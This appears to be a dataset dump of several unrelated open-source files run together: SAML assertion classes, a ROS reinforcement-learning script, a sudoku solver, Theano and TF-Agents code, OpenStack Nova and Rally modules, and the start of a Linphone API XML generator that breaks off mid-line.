c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = ( 'assertion_uri_ref', [AssertionURIRef]) c_cardinality['assertion_uri_ref'] = {"min": 0} c_cardinality['assertion'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = ( 'encrypted_assertion', [EncryptedAssertion]) c_cardinality['encrypted_assertion'] = {"min": 0} c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion', 'encrypted_assertion']) def __init__(self, assertion_id_ref=None, assertion_uri_ref=None, assertion=None, encrypted_assertion=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.assertion_id_ref = assertion_id_ref or [] self.assertion_uri_ref = assertion_uri_ref or [] self.assertion = assertion or [] self.encrypted_assertion = encrypted_assertion or [] def evidence_type__from_string(xml_string): return saml2.create_class_from_xml_string(EvidenceType_, xml_string) class Evidence(EvidenceType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Evidence element """ c_tag = 'Evidence' c_namespace = NAMESPACE c_children = EvidenceType_.c_children.copy() c_attributes = EvidenceType_.c_attributes.copy() c_child_order = EvidenceType_.c_child_order[:] c_cardinality = EvidenceType_.c_cardinality.copy() def evidence_from_string(xml_string): return saml2.create_class_from_xml_string(Evidence, xml_string) class AuthzDecisionStatementType_(StatementAbstractType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatementType element """ c_tag = 'AuthzDecisionStatementType' c_namespace = NAMESPACE c_children = StatementAbstractType_.c_children.copy() c_attributes = StatementAbstractType_.c_attributes.copy() c_child_order = StatementAbstractType_.c_child_order[:] c_cardinality = StatementAbstractType_.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Action'] = ( 'action', [Action]) c_cardinality['action'] = {"min": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Evidence'] = ( 'evidence', Evidence) c_cardinality['evidence'] = {"min": 0, "max": 1} c_attributes['Resource'] = ('resource', 'anyURI', True) c_attributes['Decision'] = ('decision', DecisionType_, True) c_child_order.extend(['action', 'evidence']) def __init__(self, action=None, evidence=None, resource=None, decision=None, text=None, extension_elements=None, extension_attributes=None): StatementAbstractType_.__init__( self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.action = action or [] self.evidence = evidence self.resource = resource self.decision = decision def authz_decision_statement_type__from_string(xml_string): return saml2.create_class_from_xml_string(AuthzDecisionStatementType_, xml_string) class AuthzDecisionStatement(AuthzDecisionStatementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatement element """ c_tag = 'AuthzDecisionStatement' c_namespace = NAMESPACE c_children = AuthzDecisionStatementType_.c_children.copy() c_attributes = AuthzDecisionStatementType_.c_attributes.copy() c_child_order = AuthzDecisionStatementType_.c_child_order[:] c_cardinality = AuthzDecisionStatementType_.c_cardinality.copy() def authz_decision_statement_from_string(xml_string): return saml2.create_class_from_xml_string(AuthzDecisionStatement, xml_string) #.................. # ['Assertion', 'AssertionType', 'AdviceType', 'Advice'] class AssertionType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AssertionType element """ c_tag = 'AssertionType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Issuer'] = ('issuer', Issuer) c_children['{http://www.w3.org/2000/09/xmldsig#}Signature'] = ('signature', ds.Signature) c_cardinality['signature'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Subject'] = ('subject', Subject) c_cardinality['subject'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Conditions'] = ( 'conditions', Conditions) c_cardinality['conditions'] = {"min": 0, "max": 1} c_cardinality['advice'] = {"min": 0, "max": 1} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Statement'] = ( 'statement', [Statement]) c_cardinality['statement'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnStatement'] = ( 'authn_statement', [AuthnStatement]) c_cardinality['authn_statement'] = {"min": 0} c_children[ '{urn:oasis:names:tc:SAML:2.0:assertion}AuthzDecisionStatement'] = ( 'authz_decision_statement', [AuthzDecisionStatement]) c_cardinality['authz_decision_statement'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeStatement'] = ( 'attribute_statement', [AttributeStatement]) c_cardinality['attribute_statement'] = {"min": 0} c_attributes['Version'] = ('version', 'string', True) c_attributes['ID'] = ('id', 'ID', True) c_attributes['IssueInstant'] = ('issue_instant', 'dateTime', True) c_child_order.extend(['issuer', 'signature', 'subject', 'conditions', 'advice', 'statement', 'authn_statement', 'authz_decision_statement', 'attribute_statement']) def __init__(self, issuer=None, signature=None, subject=None, conditions=None, advice=None, statement=None, authn_statement=None, authz_decision_statement=None, attribute_statement=None, version=None, id=None, issue_instant=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.issuer = issuer self.signature = signature self.subject = subject self.conditions = conditions self.advice = advice self.statement = statement or [] self.authn_statement = authn_statement or [] self.authz_decision_statement = authz_decision_statement or [] self.attribute_statement = attribute_statement or [] self.version = version self.id = id self.issue_instant = issue_instant def verify(self): # If no statement MUST contain a subject element if self.attribute_statement or self.statement or \ self.authn_statement or self.authz_decision_statement: pass elif not self.subject: raise MustValueError( "If no statement MUST contain a subject element") if self.authn_statement and not self.subject: raise MustValueError( "An assertion with an AuthnStatement must contain a Subject") return SamlBase.verify(self) def assertion_type__from_string(xml_string): return saml2.create_class_from_xml_string(AssertionType_, xml_string) class Assertion(AssertionType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Assertion element """ c_tag = 'Assertion' c_namespace = NAMESPACE c_children = AssertionType_.c_children.copy() c_attributes = AssertionType_.c_attributes.copy() c_child_order = AssertionType_.c_child_order[:] c_cardinality = AssertionType_.c_cardinality.copy() def assertion_from_string(xml_string): return saml2.create_class_from_xml_string(Assertion, xml_string) class AdviceType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AdviceType element """ c_tag = 'AdviceType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = ( 'assertion_id_ref', [AssertionIDRef]) c_cardinality['assertion_id_ref'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = ( 'assertion_uri_ref', [AssertionURIRef]) c_cardinality['assertion_uri_ref'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = ( 'assertion', [Assertion]) c_cardinality['assertion'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = ( 'encrypted_assertion', [EncryptedAssertion]) c_cardinality['encrypted_assertion'] = {"min": 0} c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion', 'encrypted_assertion']) c_any = {"namespace": "##other", "processContents": "lax"} def __init__(self, assertion_id_ref=None, assertion_uri_ref=None, assertion=None, encrypted_assertion=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.assertion_id_ref = assertion_id_ref or [] self.assertion_uri_ref = assertion_uri_ref or [] self.assertion = assertion or [] self.encrypted_assertion = encrypted_assertion or [] def advice_type__from_string(xml_string): return saml2.create_class_from_xml_string(AdviceType_, xml_string) class Advice(AdviceType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Advice element """ c_tag = 'Advice' c_namespace = NAMESPACE c_children = AdviceType_.c_children.copy() c_attributes = AdviceType_.c_attributes.copy() c_child_order = AdviceType_.c_child_order[:] c_cardinality = AdviceType_.c_cardinality.copy() def advice_from_string(xml_string): return saml2.create_class_from_xml_string(Advice, xml_string) # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ EvidenceType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = ( 'assertion', [Assertion]) Evidence.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = ( 'assertion', [Assertion]) AssertionType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = ( 'advice', Advice) Assertion.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = ( 'advice', Advice) # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ AG_IDNameQualifiers = [ ('NameQualifier', 'string', False), ('SPNameQualifier', 'string', False), ] ELEMENT_FROM_STRING = { BaseID.c_tag: base_id_from_string, NameID.c_tag: name_id_from_string, NameIDType_.c_tag: name_id_type__from_string, EncryptedElementType_.c_tag: encrypted_element_type__from_string, EncryptedID.c_tag: encrypted_id_from_string, Issuer.c_tag: issuer_from_string, AssertionIDRef.c_tag: assertion_id_ref_from_string, AssertionURIRef.c_tag: assertion_uri_ref_from_string, Assertion.c_tag: assertion_from_string, AssertionType_.c_tag: assertion_type__from_string, Subject.c_tag: subject_from_string, SubjectType_.c_tag: subject_type__from_string, SubjectConfirmation.c_tag: subject_confirmation_from_string, SubjectConfirmationType_.c_tag: subject_confirmation_type__from_string, SubjectConfirmationData.c_tag: subject_confirmation_data_from_string, SubjectConfirmationDataType_.c_tag: subject_confirmation_data_type__from_string, KeyInfoConfirmationDataType_.c_tag: key_info_confirmation_data_type__from_string, Conditions.c_tag: conditions_from_string, ConditionsType_.c_tag: conditions_type__from_string, Condition.c_tag: condition_from_string, AudienceRestriction.c_tag: audience_restriction_from_string, AudienceRestrictionType_.c_tag: audience_restriction_type__from_string, Audience.c_tag: audience_from_string, OneTimeUse.c_tag: one_time_use_from_string, OneTimeUseType_.c_tag: one_time_use_type__from_string, ProxyRestriction.c_tag: proxy_restriction_from_string, ProxyRestrictionType_.c_tag: proxy_restriction_type__from_string, Advice.c_tag: advice_from_string, AdviceType_.c_tag: advice_type__from_string, EncryptedAssertion.c_tag: encrypted_assertion_from_string, Statement.c_tag: statement_from_string, AuthnStatement.c_tag: authn_statement_from_string, AuthnStatementType_.c_tag: authn_statement_type__from_string, SubjectLocality.c_tag: subject_locality_from_string, SubjectLocalityType_.c_tag: subject_locality_type__from_string, AuthnContext.c_tag: authn_context_from_string, AuthnContextType_.c_tag: authn_context_type__from_string, AuthnContextClassRef.c_tag: authn_context_class_ref_from_string, AuthnContextDeclRef.c_tag: authn_context_decl_ref_from_string, AuthnContextDecl.c_tag: authn_context_decl_from_string, AuthenticatingAuthority.c_tag: authenticating_authority_from_string, AuthzDecisionStatement.c_tag: authz_decision_statement_from_string, AuthzDecisionStatementType_.c_tag: authz_decision_statement_type__from_string, DecisionType_.c_tag: decision_type__from_string, Action.c_tag: action_from_string, ActionType_.c_tag: action_type__from_string, Evidence.c_tag: evidence_from_string, EvidenceType_.c_tag: evidence_type__from_string, AttributeStatement.c_tag: attribute_statement_from_string, AttributeStatementType_.c_tag: attribute_statement_type__from_string, Attribute.c_tag: attribute_from_string, AttributeType_.c_tag: attribute_type__from_string, AttributeValue.c_tag: attribute_value_from_string, EncryptedAttribute.c_tag: encrypted_attribute_from_string, } ELEMENT_BY_TAG = { 'BaseID': BaseID, 'NameID': NameID, 'NameIDType': NameIDType_, 'EncryptedElementType': EncryptedElementType_, 'EncryptedID': EncryptedID, 'Issuer': Issuer, 'AssertionIDRef': AssertionIDRef, 'AssertionURIRef': AssertionURIRef, 'Assertion': Assertion, 'AssertionType': AssertionType_, 'Subject': Subject, 'SubjectType': SubjectType_, 'SubjectConfirmation': SubjectConfirmation, 'SubjectConfirmationType': SubjectConfirmationType_, 'SubjectConfirmationData': SubjectConfirmationData, 'SubjectConfirmationDataType': SubjectConfirmationDataType_, 'KeyInfoConfirmationDataType': KeyInfoConfirmationDataType_, 'Conditions': Conditions, 'ConditionsType': ConditionsType_, 'Condition': Condition, 'AudienceRestriction': AudienceRestriction, 'AudienceRestrictionType': AudienceRestrictionType_, 'Audience': Audience, 'OneTimeUse': OneTimeUse, 'OneTimeUseType': OneTimeUseType_, 'ProxyRestriction': ProxyRestriction, 'ProxyRestrictionType': ProxyRestrictionType_, 'Advice': Advice, 'AdviceType': AdviceType_, 'EncryptedAssertion': EncryptedAssertion, 'Statement': Statement, 'AuthnStatement': AuthnStatement, 'AuthnStatementType': AuthnStatementType_, 'SubjectLocality': SubjectLocality, 'SubjectLocalityType': SubjectLocalityType_, 'AuthnContext': AuthnContext, 'AuthnContextType': AuthnContextType_, 'AuthnContextClassRef': AuthnContextClassRef, 'AuthnContextDeclRef': AuthnContextDeclRef, 'AuthnContextDecl': AuthnContextDecl, 'AuthenticatingAuthority': AuthenticatingAuthority, 'AuthzDecisionStatement': AuthzDecisionStatement, 'AuthzDecisionStatementType': AuthzDecisionStatementType_, 'DecisionType': DecisionType_, 'Action': Action, 'ActionType': ActionType_, 'Evidence': Evidence, 'EvidenceType': EvidenceType_, 'AttributeStatement': AttributeStatement, 'AttributeStatementType': AttributeStatementType_, 'Attribute': Attribute, 'AttributeType': AttributeType_, 'AttributeValue': AttributeValue, 'EncryptedAttribute': EncryptedAttribute, 'BaseIDAbstractType': BaseIDAbstractType_, 'ConditionAbstractType': ConditionAbstractType_, 'StatementAbstractType': StatementAbstractType_, } def factory(tag, **kwargs): return ELEMENT_BY_TAG[tag](**kwargs)
1.820313
2
ROS_packages/custom_ROS_envs/turtlebot2_maze_env/src/turtlebot2_maze_random.py
PierreExeter/custom_gym_envs
1
1864
<reponame>PierreExeter/custom_gym_envs<filename>ROS_packages/custom_ROS_envs/turtlebot2_maze_env/src/turtlebot2_maze_random.py<gh_stars>1-10 #!/usr/bin/env python import gym import rospy from openai_ros.openai_ros_common import StartOpenAI_ROS_Environment # initialise environment rospy.init_node('turtlebot2_maze_random', anonymous=True, log_level=rospy.WARN) task_and_robot_environment_name = rospy.get_param('/turtlebot2/task_and_robot_environment_name') env = StartOpenAI_ROS_Environment(task_and_robot_environment_name) print("Environment: ", env) print("Action space: ", env.action_space) # print(env.action_space.high) # print(env.action_space.low) print("Observation space: ", env.observation_space) print(env.observation_space.high) print(env.observation_space.low) for episode in range(20): env.reset() for t in range(100): action = env.action_space.sample() obs, reward, done, info = env.step(action) print("episode: ", episode) print("timestep: ", t) print("obs: ", obs) print("action:", action) print("reward: ", reward) print("done: ", done) print("info: ", info) if done: print("Episode {} finished after {} timesteps".format(episode, t+1)) break env.close()
2.21875
2
solver.py
jacobchh/Sudoku-Solver
1
1865
import numpy as np board = np.zeros(shape=(9, 9)) count = 0 def solve(): global count count += 1 if count % 1000 == 0: print('\rCurrent number of computations made:', count, end='') freePos = find() if freePos is None: return True i = freePos[0] j = freePos[1] for w in range(1, 10): if possible(w, freePos): board[i][j] = w if solve(): return True board[i][j] = 0 return False def find(): for i in range(9): for j in range(9): if board[i][j] == 0: return [i, j] return None def possible(value, position): # position = (i, j) tuple i = position[0] j = position[1] # checks row and column for repeat value if (value in board[:, j]) or (value in board[i]): return False # reset to i,j - top left square i = (i // 3) * 3 j = (j // 3) * 3 # check all squares in square for n in range(i, i + 3): for m in range(j, j + 3): if board[n][m] == value: return False return True def change(position): # position = (i, j) tuple i = position[0] j = position[1] for w in range(1, 10): if w not in board[:, j] and w not in board[i]: board[i][j] = w return True return False def initialize(): print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank") integerChunk = input("Numbers: ") pos = 0 for i in range(9): for j in range(9): board[i][j] = int(integerChunk[pos]) pos += 1 def displayBoard(): for i in range(3): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") print("- - - - - - - - - - -") for i in range(3, 6): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") print("- - - - - - - - - - -") for i in range(6, 9): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") def main(): initialize() print("Is this the correct board? Press enter to continue or 'q' to exit program.") displayBoard() response = input() if response == "q": exit() print("---------------SOLVING---------------\n") solve() print("\r\rSOLUTION") displayBoard() print("\nTotal number of computations:", count) if __name__ == "__main__": main()
3.46875
3
01_basics/01_building_expressions/02_vector_mat_soln.py
johny-c/theano_exercises
711
1866
<filename>01_basics/01_building_expressions/02_vector_mat_soln.py import numpy as np from theano import function import theano.tensor as T def make_vector(): """ Returns a new Theano vector. """ return T.vector() def make_matrix(): """ Returns a new Theano matrix. """ return T.matrix() def elemwise_mul(a, b): """ a: A theano matrix b: A theano matrix Returns the elementwise product of a and b """ return a * b def matrix_vector_mul(a, b): """ a: A theano matrix b: A theano vector Returns the matrix-vector product of a and b """ return T.dot(a, b) if __name__ == "__main__": a = make_vector() b = make_vector() c = elemwise_mul(a, b) d = make_matrix() e = matrix_vector_mul(d, c) f = function([a, b, d], e) rng = np.random.RandomState([1, 2, 3]) a_value = rng.randn(5).astype(a.dtype) b_value = rng.rand(5).astype(b.dtype) c_value = a_value * b_value d_value = rng.randn(5, 5).astype(d.dtype) expected = np.dot(d_value, c_value) actual = f(a_value, b_value, d_value) assert np.allclose(actual, expected) print "SUCCESS!"
3.0625
3
nova/api/openstack/compute/used_limits.py
bopopescu/nova-8
0
1867
# Copyright 2012 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.openstack import api_version_request from nova.api.openstack.api_version_request \ import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION from nova.api.openstack import extensions from nova.api.openstack import wsgi from nova.policies import used_limits as ul_policies from nova import quota QUOTAS = quota.QUOTAS class UsedLimitsController(wsgi.Controller): @staticmethod def _reserved(req): try: return int(req.GET['reserved']) except (ValueError, KeyError): return False @wsgi.extends @extensions.expected_errors(()) def index(self, req, resp_obj): context = req.environ['nova.context'] project_id = self._project_id(context, req) quotas = QUOTAS.get_project_quotas(context, project_id, usages=True) if api_version_request.is_supported( req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION): quota_map = { 'totalRAMUsed': 'ram', 'totalCoresUsed': 'cores', 'totalInstancesUsed': 'instances', 'totalServerGroupsUsed': 'server_groups', } else: quota_map = { 'totalRAMUsed': 'ram', 'totalCoresUsed': 'cores', 'totalInstancesUsed': 'instances', 'totalFloatingIpsUsed': 'floating_ips', 'totalSecurityGroupsUsed': 'security_groups', 'totalServerGroupsUsed': 'server_groups', } used_limits = {} for display_name, key in quota_map.items(): if key in quotas: reserved = (quotas[key]['reserved'] if self._reserved(req) else 0) used_limits[display_name] = quotas[key]['in_use'] + reserved resp_obj.obj['limits']['absolute'].update(used_limits) def _project_id(self, context, req): if 'tenant_id' in req.GET: tenant_id = req.GET.get('tenant_id') target = { 'project_id': tenant_id, 'user_id': context.user_id } context.can(ul_policies.BASE_POLICY_NAME, target) return tenant_id return context.project_id
1.835938
2
tf_agents/bandits/agents/examples/v2/trainer.py
howards11/agents
3,175
1868
<reponame>howards11/agents<filename>tf_agents/bandits/agents/examples/v2/trainer.py # coding=utf-8 # Copyright 2020 The TF-Agents Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. r"""Generic TF-Agents training function for bandits.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os from absl import logging import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import from tf_agents.drivers import dynamic_step_driver from tf_agents.eval import metric_utils from tf_agents.metrics import tf_metrics from tf_agents.policies import policy_saver from tf_agents.replay_buffers import tf_uniform_replay_buffer tf = tf.compat.v2 AGENT_CHECKPOINT_NAME = 'agent' STEP_CHECKPOINT_NAME = 'step' CHECKPOINT_FILE_PREFIX = 'ckpt' def get_replay_buffer(data_spec, batch_size, steps_per_loop): """Return a `TFUniformReplayBuffer` for the given `agent`.""" buf = tf_uniform_replay_buffer.TFUniformReplayBuffer( data_spec=data_spec, batch_size=batch_size, max_length=steps_per_loop) return buf def set_expected_shape(experience, num_steps): def set_time_dim(input_tensor, steps): tensor_shape = input_tensor.shape.as_list() tensor_shape[1] = steps input_tensor.set_shape(tensor_shape) tf.nest.map_structure(lambda t: set_time_dim(t, num_steps), experience) def get_training_loop_fn(driver, replay_buffer, agent, steps): """Returns a `tf.function` that runs the driver and training loops. Args: driver: an instance of `Driver`. replay_buffer: an instance of `ReplayBuffer`. agent: an instance of `TFAgent`. steps: an integer indicating how many driver steps should be executed and presented to the trainer during each training loop. """ def training_loop(): """Returns a `tf.function` that runs the training loop.""" driver.run() batch_size = driver.env.batch_size dataset = replay_buffer.as_dataset( sample_batch_size=batch_size, num_steps=steps, single_deterministic_pass=True) experience, unused_info = tf.data.experimental.get_single_element(dataset) set_expected_shape(experience, steps) loss_info = agent.train(experience) replay_buffer.clear() return loss_info return training_loop def restore_and_get_checkpoint_manager(root_dir, agent, metrics, step_metric): """Restores from `root_dir` and returns a function that writes checkpoints.""" trackable_objects = {metric.name: metric for metric in metrics} trackable_objects[AGENT_CHECKPOINT_NAME] = agent trackable_objects[STEP_CHECKPOINT_NAME] = step_metric checkpoint = tf.train.Checkpoint(**trackable_objects) checkpoint_manager = tf.train.CheckpointManager(checkpoint=checkpoint, directory=root_dir, max_to_keep=5) latest = checkpoint_manager.latest_checkpoint if latest is not None: logging.info('Restoring checkpoint from %s.', latest) checkpoint.restore(latest) logging.info('Successfully restored to step %s.', step_metric.result()) else: logging.info('Did not find a pre-existing checkpoint. ' 'Starting from scratch.') return checkpoint_manager def train(root_dir, agent, environment, training_loops, steps_per_loop, additional_metrics=(), training_data_spec_transformation_fn=None): """Perform `training_loops` iterations of training. Checkpoint results. If one or more baseline_reward_fns are provided, the regret is computed against each one of them. Here is example baseline_reward_fn: def baseline_reward_fn(observation, per_action_reward_fns): rewards = ... # compute reward for each arm optimal_action_reward = ... # take the maximum reward return optimal_action_reward Args: root_dir: path to the directory where checkpoints and metrics will be written. agent: an instance of `TFAgent`. environment: an instance of `TFEnvironment`. training_loops: an integer indicating how many training loops should be run. steps_per_loop: an integer indicating how many driver steps should be executed and presented to the trainer during each training loop. additional_metrics: Tuple of metric objects to log, in addition to default metrics `NumberOfEpisodes`, `AverageReturnMetric`, and `AverageEpisodeLengthMetric`. training_data_spec_transformation_fn: Optional function that transforms the data items before they get to the replay buffer. """ # TODO(b/127641485): create evaluation loop with configurable metrics. if training_data_spec_transformation_fn is None: data_spec = agent.policy.trajectory_spec else: data_spec = training_data_spec_transformation_fn( agent.policy.trajectory_spec) replay_buffer = get_replay_buffer(data_spec, environment.batch_size, steps_per_loop) # `step_metric` records the number of individual rounds of bandit interaction; # that is, (number of trajectories) * batch_size. step_metric = tf_metrics.EnvironmentSteps() metrics = [ tf_metrics.NumberOfEpisodes(), tf_metrics.AverageEpisodeLengthMetric(batch_size=environment.batch_size) ] + list(additional_metrics) if isinstance(environment.reward_spec(), dict): metrics += [tf_metrics.AverageReturnMultiMetric( reward_spec=environment.reward_spec(), batch_size=environment.batch_size)] else: metrics += [ tf_metrics.AverageReturnMetric(batch_size=environment.batch_size)] if training_data_spec_transformation_fn is not None: add_batch_fn = lambda data: replay_buffer.add_batch( # pylint: disable=g-long-lambda training_data_spec_transformation_fn(data)) else: add_batch_fn = replay_buffer.add_batch observers = [add_batch_fn, step_metric] + metrics driver = dynamic_step_driver.DynamicStepDriver( env=environment, policy=agent.collect_policy, num_steps=steps_per_loop * environment.batch_size, observers=observers) training_loop = get_training_loop_fn( driver, replay_buffer, agent, steps_per_loop) checkpoint_manager = restore_and_get_checkpoint_manager( root_dir, agent, metrics, step_metric) train_step_counter = tf.compat.v1.train.get_or_create_global_step() saver = policy_saver.PolicySaver(agent.policy, train_step=train_step_counter) summary_writer = tf.summary.create_file_writer(root_dir) summary_writer.set_as_default() for i in range(training_loops): training_loop() metric_utils.log_metrics(metrics) for metric in metrics: metric.tf_summaries(train_step=step_metric.result()) checkpoint_manager.save() if i % 100 == 0: saver.save(os.path.join(root_dir, 'policy_%d' % step_metric.result()))
1.960938
2
rally_openstack/cfg/manila.py
RSE-Cambridge/rally-openstack
0
1869
<filename>rally_openstack/cfg/manila.py # Copyright 2013: Mirantis Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from rally.common import cfg OPTS = {"openstack": [ cfg.FloatOpt( "manila_share_create_prepoll_delay", default=2.0, deprecated_group="benchmark", help="Delay between creating Manila share and polling for its " "status."), cfg.FloatOpt( "manila_share_create_timeout", default=300.0, deprecated_group="benchmark", help="Timeout for Manila share creation."), cfg.FloatOpt( "manila_share_create_poll_interval", default=3.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila share " "creation."), cfg.FloatOpt( "manila_share_delete_timeout", default=180.0, deprecated_group="benchmark", help="Timeout for Manila share deletion."), cfg.FloatOpt( "manila_share_delete_poll_interval", default=2.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila share " "deletion."), cfg.FloatOpt( "manila_access_create_timeout", default=300.0, deprecated_group="benchmark", help="Timeout for Manila access creation."), cfg.FloatOpt( "manila_access_create_poll_interval", default=3.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila access " "creation."), cfg.FloatOpt( "manila_access_delete_timeout", default=180.0, deprecated_group="benchmark", help="Timeout for Manila access deletion."), cfg.FloatOpt( "manila_access_delete_poll_interval", default=2.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila access " "deletion."), ]}
1.648438
2
app/backend/app/crud/crud_register_invoice.py
matayoos/invoice-scrapper
0
1870
<gh_stars>0 from sqlalchemy.orm.session import Session from app import crud from .utils import insert, get_content def register_invoice(db: Session, url: str): content = get_content.get_invoice_info(url) grocery_store_id = insert.insert_grocery_store_info( db, obj_in=content["grocery_store"] ) invoice_id = insert.insert_invoice_info( db, obj_in=content["invoice"], grocery_store_id=grocery_store_id ) insert.insert_invoice_items(db, content["items"], grocery_store_id, invoice_id) return crud.get_invoice_by_id(db, id=invoice_id)
2.546875
3
examples/web/handlers.py
nicoddemus/aioworkers
45
1871
<reponame>nicoddemus/aioworkers<filename>examples/web/handlers.py async def handler(context): return await context.data
1.320313
1
tools/genapixml.py
garronej/linphone
0
1872
#!/usr/bin/python # Copyright (C) 2014 Belledonne Communications SARL # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import argparse import os import six import string import sys import xml.etree.ElementTree as ET import xml.dom.minidom as minidom import metadoc class CObject: def __init__(self, name): self.name = name.strip() self.briefDescription = '' self.detailedDescription = None self.deprecated = False self.briefDoc = None class CEnumValue(CObject): def __init__(self, name): CObject.__init__(self, name) self.value = None class CEnum(CObject): def __init__(self, name): CObject.__init__(self, name) self.values = [] self.associatedTypedef = None def addValue(self, value): self.values.append(value) class CStructMember(CObject): def __init__(self, name, t): CObject.__init__(self, name) self.ctype = t.strip() class CStruct(CObject): def __init__(self, name): CObject.__init__(self, name) self.members = [] self.associatedTypedef = None def addMember(self, member): self.members.append(member) class CTypedef(CObject): def __init__(self, name, definition): CObject.__init__(self, name) self.definition = definition.strip() class CArgument(CObject): def __init__(self, t, name = '', enums = [], structs = []): CObject.__init__(self, name) self.description = None self.containedType = None keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ] fullySplittedType = [] splittedType = t.strip().split(' ') for s in splittedType: if s.startswith('*'): fullySplittedType.append('*') if len(s) > 1: fullySplittedType.append(s[1:]) elif s.endswith('*'): fullySplittedType.append(s[:-1]) fullySplittedType.append('*') else: fullySplittedType.append(s) if 'MS2_DEPRECATED' in fullySplittedType: fullySplittedType.remove('MS2_DEPRECATED') elif 'LINPHONE_DEPRECATED' in fullySplittedType: fullySplittedType.remove('LINPHONE_DEPRECATED') isStruct = False isEnum = False self.ctype = 'int' # Default to int so that the result is correct eg. for 'unsigned short' for s in fullySplittedType: if not s in keywords: self.ctype = s if s == 'struct': isStruct = True if s == 'enum': isEnum = True if isStruct: for st in structs: if st.associatedTypedef is not None: self.ctype = st.associatedTypedef.name elif isEnum: for e in enums: if e.associatedTypedef 